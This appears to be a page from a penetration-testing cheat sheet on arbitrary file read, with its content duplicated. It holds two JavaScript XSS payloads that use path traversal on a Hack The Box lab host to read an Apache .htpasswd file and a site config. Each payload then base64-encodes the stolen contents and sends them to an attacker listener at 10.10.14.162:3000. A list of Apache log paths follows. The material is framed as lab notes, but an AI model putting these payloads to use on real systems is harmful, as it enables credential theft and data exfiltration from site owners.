Arbitrary File Read

Apache

Authorization File

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Default config file

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

`Logs`

Access Logs:
- /var/log/apache2/access.log
- /var/log/httpd/access_log
Error logs:
- /var/log/apache2/error.log
- /var/log/httpd/error_log

PreviousMain Techniques NextSession Hijacking

Last updated 1 day ago

Arbitrary File Read

Apache

Authorization File

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../var/www/statistics.alert.htb/.htpasswd', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

Default config file

var req = new XMLHttpRequest();
req.open('GET', 'http://alert.htb/messages.php?file=../../../../../etc/apache2/sites-available/000-default.conf', false);
req.send();
var req2 = new XMLHttpRequest();
req2.open('GET', 'http://10.10.14.162:3000/?content=' + btoa(req.responseText),
true);
req2.send();

`Logs`

Access Logs:
- /var/log/apache2/access.log
- /var/log/httpd/access_log
Error logs:
- /var/log/apache2/error.log
- /var/log/httpd/error_log

PreviousMain Techniques NextSession Hijacking

Last updated 1 day ago